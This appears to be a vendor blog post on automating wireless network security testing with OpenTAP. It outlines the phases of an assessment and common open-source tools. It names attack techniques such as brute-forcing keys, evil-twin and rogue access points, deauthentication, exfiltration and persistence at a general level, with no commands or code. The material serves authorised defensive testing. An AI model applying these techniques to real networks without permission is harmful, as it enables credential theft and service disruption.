Skip to content
Published on

OpenTAP and Security Testing IV - Wireless Security


Wireless Network Security Testing

  • Purpose: Evaluates the security of wireless networks and access points.

  • Methodology: OpenTAP initiates scans for unauthorized or misconfigured Wi-Fi networks, weak encryption, and potential vulnerabilities.

  • Output: Reports on wireless network vulnerabilities and recommendations for improvements.

What is Wireless Network Security Testing

Wireless network security testing involves evaluating the security measures and protocols of a wireless network to identify vulnerabilities and ensure the network is protected against unauthorized access and attacks. The testing process typically includes several steps and techniques, and so benefit greatly from test automation with OpenTAP

Wireless network security testing can be broken out into several discrete steps or phases:

Preparation and Planning

Careful planning of your security exercise will render more consistent results.

  • Scope Definition: Determine the scope of the testing, including the wireless networks, devices, and applications to be tested. Make sure that the tools you plan to use can be invoked as OpenTAP test steps, via normal command line usage or other scripted invocation methods.

  • Legal and Ethical Considerations: Obtain necessary permissions and ensure compliance with legal and ethical standards.

  • Documentation: Gather information about the network architecture, security policies, and previous security assessments.

Reconnaissance and Discovery

Find out which networks are present on your site - you may be surprised!

  • Network Scanning: Use tools to identify wireless networks (SSID), access points (APs), and devices connected to the network.

  • War Driving: Physically moving around to locate and map wireless networks and their coverage areas. Automating this step lets you build a catalog of networks detected.

  • Packet Sniffing: Capture and analyze wireless traffic to gather information about the network and identify any unencrypted data.

Vulnerability Assessment

Once you have discovered weaknesses in your wireless network security, take time to assess the severity, scope and locale of those vulnerabilities. As with other steps, you can use OpenTAP results listeners and loggers to create reports from the analysis.

  • Wireless Protocol Analysis: Analyze the security of wireless protocols in use (e.g., WEP, WPA, WPA2, WPA3) to identify weaknesses.

  • Configuration Review: Check the configuration settings of access points and other network devices for insecure settings (e.g., default passwords, weak encryption).

  • Firmware and Software Analysis: Ensure that the firmware and software on wireless devices are up-to-date and free from known vulnerabilities.

Penetration Testing

You never really appreciate the gravity of network security challenges until you put on a black hat yourself and attempt to break your way in and/or fool users into helping you. Automating this activity streamlines your efforts to bust your way. See our earlier blog on Penetration Testing for additional info.

  • Brute Force Attacks: Attempt to crack weak passwords and encryption keys using brute force methods.

  • Rogue Access Point Deployment: Set up unauthorized access points to see if they can lure legitimate users into connecting, allowing interception of network traffic.

  • Evil Twin Attack: Create a fake access point mimicking a legitimate one to capture authentication credentials and other sensitive information.

  • De-authentication Attacks: Send de-authentication frames to disconnect legitimate users from the network, potentially capturing re-authentication packets for analysis.


Once you're in, how broad is your access and what data is exposed?

  • Access and Escalation: Once access is gained, attempt to escalate privileges to access sensitive information or critical systems.

  • Data Exfiltration: Simulate data theft to assess the network’s detection and response capabilities.

  • Persistence: Evaluate if it’s possible to maintain access over time without detection.

Reporting and Mitigation

Don't keep your discoveries a secret! Share your findings with IT and cybersecurity teams.

  • Documentation of Findings: Compile a detailed report of all findings, including identified vulnerabilities, exploited weaknesses, and potential impacts.

  • Recommendations: Provide recommendations for mitigating identified vulnerabilities, including configuration changes, firmware updates, and improved security practices.

  • Remediation Support: Assist with the implementation of recommended security measures and verify their effectiveness through retesting.

Ongoing Monitoring and Maintenance

Incrementally improve security using what you've learned. Continue using OpenTAP to launch your security tools and record their output.

  • Continuous Monitoring: Implement continuous monitoring tools to detect and respond to new threats and vulnerabilities.

  • Regular Audits: Schedule regular security audits and testing to ensure the network remains secure as new threats emerge.

Tools for Wireless Network Security Testing

The following open source tools are employed by cybersecurity pros to test wireless networks:

Aircrack-ng: Aircrack-ng is a suite of tools for assessing WiFi network security. It focuses on multiple areas of WiFi security:

Monitoring: Packet capture and export of data to text files for further processing by third party tools

  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection

  • Testing: Checking WiFi cards and driver capabilities (capture and injection)

  • Cracking: WEP and WPA PSK (WPA 1 and 2)

Primarily command-line driver, Aircrack-ng runs on Linux Windows, macOS, FreeBSD, OpenBSD, NetBSD, as well as Solaris. Learn more.

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a/b/g/n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and macOS. The client can also run on Microsoft Windows, but with limited use cases. Learn more.

Metasploit: The Metasploit Project is a computer security project that provides information about vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.. Learn more.

Reaver: Reaver is part of Kali Linux and provides capabilities for brute force attacks on WPS (Wi-Fi Protected Setup) PINs. Learn more.

Wireshark: Wireshark is a free and open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development. Wireshark is cross-platform, running on Linux, macOS, BSD, Solaris, and other Unix operating systems, and Microsoft Windows. Learn more.

By conducting thorough wireless network security testing, organizations can identify and address vulnerabilities, ensuring their wireless networks are secure against unauthorized access and cyber attacks.

The Impact of Test Automation

Automating your wireless network security testing with OpenTAP streamlines the entire process, makes your testing easily repeatable, and facilitates logging and documentation your results. Using OpenTAP enhances the efficiency, accuracy, and effectiveness of security testing efforts, helping identify and remediate security vulnerabilities before they can be exploited by attackers.